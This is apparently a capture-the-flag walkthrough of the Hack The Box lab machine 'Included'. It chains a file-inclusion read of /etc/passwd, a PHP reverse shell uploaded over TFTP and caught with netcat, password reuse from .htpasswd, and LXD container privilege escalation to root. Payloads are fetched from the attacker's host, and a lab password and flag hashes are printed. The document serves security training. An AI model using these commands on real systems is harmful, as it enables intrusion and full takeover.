Included (VIP only)

Enumeration

As usual, let's start with nmap:

nmap -sV -sC 10.129.166.191

Let's also do an udp scan too using:

sudo nmap -sU 10.129.166.191

Enter your password

Note that port 69 udp is open, which is associated with tftp.

Port 80 is open, so let's check the website by going to : http://10.129.166.191

Even though I typed http://10.129.166.191, I got redirected to http://10.129.166.191/?file=home.php

This looks like file inclusion, explaining the name of the machine "included"

Let's try it. Let's see if we can access the file /etc/passwd using http://10.129.166.191/?file=/etc/passwd

Great!

Using curl, we can have a nicer display of users

curl http://10.129.166.191/?file=/etc/passwd

What is the /etc/passwd file?

• The /etc/passwd file keeps track of all the registered users on the system. It is a colon-separated file ( : )

• It contains, in this order, user name, encrypted password, UID, GID, user home directory, login shell

• The file /etc/passwd is owned by the root user but must be readable by all users. Only root can write this file.

• Then encrypted passwords are stored in /etc/security/passwd file

Earlier, we found from the udp scan that udp port 69/udp is open, which is associated with tftp

Let's install tftp first using:

sudo apt install tftp

Once installed, type:

tftp 10.129.166.191

Foothold

Open a new command prompt window and type:

locate webshells

cd /usr/share/webshells/php

ls

We are interested in php-reverse-shell.php. Let's make a copy first, called shell.php

sudo cp php-reverse-shell.php shell.php

ls

Let's now move shell.php to our home directory

sudo mv shell.php /home/htb-sneakymouse/

Now open a new command prompt window and type:

ls

We can see shell.php is now here in our home directory

Now let's edit this shell.php file using:

sudo nano shell.php

Scroll down until you see:

We need to change the $ip to the IP of our VM

We need to change the $port to 4444 (this is because we will set up our netcat listener on port 4444)

When done, use:

Ctrl X

Press Y

Press enter

Now that we have shell.php ready, we need to upload it to the target using tftp. Go back to your tftp session and type:

put shell.php

Now that we have uploaded our file we can just quit:

quit

Now let's open a new command prompt window and set up our netcat listener on port 4444

nc -lnvp 4444

Now go the url http://10.129.166.191/?file=/var/lib/tftpboot/shell.php

Nothing happens but this is triggering the shell.php file on the target machine. Now go back to your netcat and you should have a connection:

We got the shell! Let's upgrade the shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ls

whoami

cd home

ls

cd mike

ls

cat user.txt

We are www-data and we are not allowed to read user.txt in mike directory

Lateral movement

Let's look for some credentials in:

cd var/www/html

ls -al

.htpasswd is where we store the password for the website

cat .htpasswd

We got the password! Maybe mike is using the same password to access the system

Sheffield19

su mike

When prompted for the password, type:

Sheffield19

We got in and we are now Mike

id

cd /home

ls

cd mike

ls

cat user.txt

Congratulations! You got the user flag!

a56ef91d70cfbf2cdb8f454c006935a1

Privilege escalation

sudo -l

mike was not granted sudo right on the machine

id

Let's google lxd and lxd privilege escalation. We find that we can escalate our privileges using lxd. With lxd, we can run system containers. system containers are like a full OS, almost like a VM.

From you VM, open a new command prompt window and follow the steps below:

sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

--> this installs the Go programming languages along with some other required packages

git clone https://github.com/lxc/distrobuilder

--> this downloads a copy of distrobuilder. We need distrobuilder to create container images for lxd

cd distrobuilder

make

--> distrobuilder has been built successfully!

Create a new directory called ContainerImages and a directory inside it called alpine using:

mkdir ContainerImages

cd ContainerImages

mkdir alpine

cd alpine

Let's also download the alpine.yaml file using:

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

ls

Let's now build it:

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

when done you should have something like this

ls

we now have lxd.tar.xz and rootfs.squashfs

Let's create a web service on port 8000 on our VM using:

python3 -m http.server 8000

Now let's switch back to the shell on the target.

Type:

cd /tmp

wget http://10.10.14.82:8000/rootfs.squashfs

--> this go retrieve the rootfs.squashfs from the webserver we just created on our VM and download the file to the target machine

wget http://10.10.14.82:8000/lxd.tar.xz

--> this go retrieve the lxd.tar.xz from the webserver we just created on our VM and download the file to the target machine

ls

Now the files are on the target machine!

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

--> this import the image and call it with the alias alpine

lxc image list

--> we use this command to make sure the image has been imported properly

lxc init alpine privesc -c security.privileged=true

lxc list

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc

lxc exec privesc /bin/sh

We got a shell! not the prettiest shell but that will do!

cd /mnt/root/root

cat root.txt

Congratulations! You got the root flag!

cc693d9c7499d9f572ee375d4c14c7bcfca